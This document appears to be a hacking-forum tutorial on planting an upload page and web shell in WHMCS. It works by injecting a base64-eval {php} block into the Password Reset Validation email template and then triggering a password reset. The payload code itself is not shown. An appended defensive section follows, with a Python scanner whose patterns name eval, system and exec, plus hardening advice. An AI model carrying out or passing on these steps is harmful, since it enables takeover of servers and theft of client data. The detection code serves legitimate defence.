WHMCS Shell Uploader via Admin Panel
This is an alternative way to upload a shell through the WHMCS Admin Panel.

What do you need?
- Any account with Admin privileges

In this method we are going to insert an UPLOAD page on our target website using PHP code.
So, let's start!

After getting access to the admin panel, go to Setup and click on General Settings:
[Image: 2q0r0yd.png]



Then look in the left panel for Email Templates:
[Image: 23ljimq.png]



Choose Password Reset Validation:
[Image: jhcu55.png]



Now you are looking at an email template. This template is used when someone wants to reset his/her account password. And guess what: it is vulnerable! We can insert malicious code in place of {$client_name}, so when you or someone else requests a new password from the server, instead of filling in $client_name it is going to run the injected code.
So just replace {$client_name} with this code, a {php} block that evals a base64-encoded payload:




It should look like this:
[Image: 13yr07.png]



Now all you need to do is find any client email address and request a new password, or create a new account and do the same.

After that the code will create an upload page at the following path:
Code:
www.target.com/InsiderMadLeets.php

Now, just upload your shell and it will be placed in the same path as the upload page!

Enjoy!
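
From the defender's side, the template change described above is easy to spot: a {php} block, eval/base64_decode calls and a long encoded string inside an email body. The following is an added example, not part of the original post, that scans template bodies for those markers; the function names and sample templates are constructed, and exporting the templates from WHMCS is assumed to be done separately.

```python
import re

# Smarty {php} / {/php} tags: their content runs as PHP when the template renders.
PHP_TAG = re.compile(r"\{\s*/?\s*php\s*\}", re.I)
# PHP calls that have no business appearing in an email body.
RISKY_CALLS = re.compile(
    r"\b(eval|assert|base64_decode|system|exec|shell_exec|passthru|"
    r"fopen|fwrite|file_put_contents|move_uploaded_file)\s*\(", re.I)
# A long unbroken base64 run usually means an encoded payload.
B64_RUN = re.compile(r"[A-Za-z0-9+/=]{80,}")
# Zero-width characters can split keywords in copied text; drop them first.
ZERO_WIDTH = re.compile(r"[\u200b\u200c\u200d\ufeff]")


def scan_template(body):
    """Return the reasons one template body looks tampered with (empty if none)."""
    cleaned = ZERO_WIDTH.sub("", body)
    reasons = []
    if PHP_TAG.search(cleaned):
        reasons.append("smarty-php-tag")
    calls = sorted({c.lower() for c in RISKY_CALLS.findall(cleaned)})
    reasons += ["call:" + c for c in calls]
    if B64_RUN.search(cleaned):
        reasons.append("long-base64-run")
    return reasons


def scan_all(templates):
    """Map template name -> reasons, keeping only templates with findings."""
    results = {name: scan_template(body) for name, body in templates.items()}
    return {name: r for name, r in results.items() if r}


# Constructed sample data: template names and bodies are illustrative only.
SAMPLES = {
    "Password Reset Validation": (
        "Dear {php}eval(base64_decode('" + "QUJD" * 30 + "'));{/php},\n"
        "To reset your password, use the link below.\n"
    ),
    "Order Confirmation": "Dear {$client_name},\nThank you for your order.\n",
}

if __name__ == "__main__":
    for name, reasons in scan_all(SAMPLES).items():
        print(f"{name}: {', '.join(reasons)}")
```

Any hit on an email template warrants checking the web root for PHP files that are not part of the WHMCS distribution. WHMCS also has an Allow Smarty PHP Tags option under General Settings (Security tab); keeping it disabled stops {php} blocks from being evaluated.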
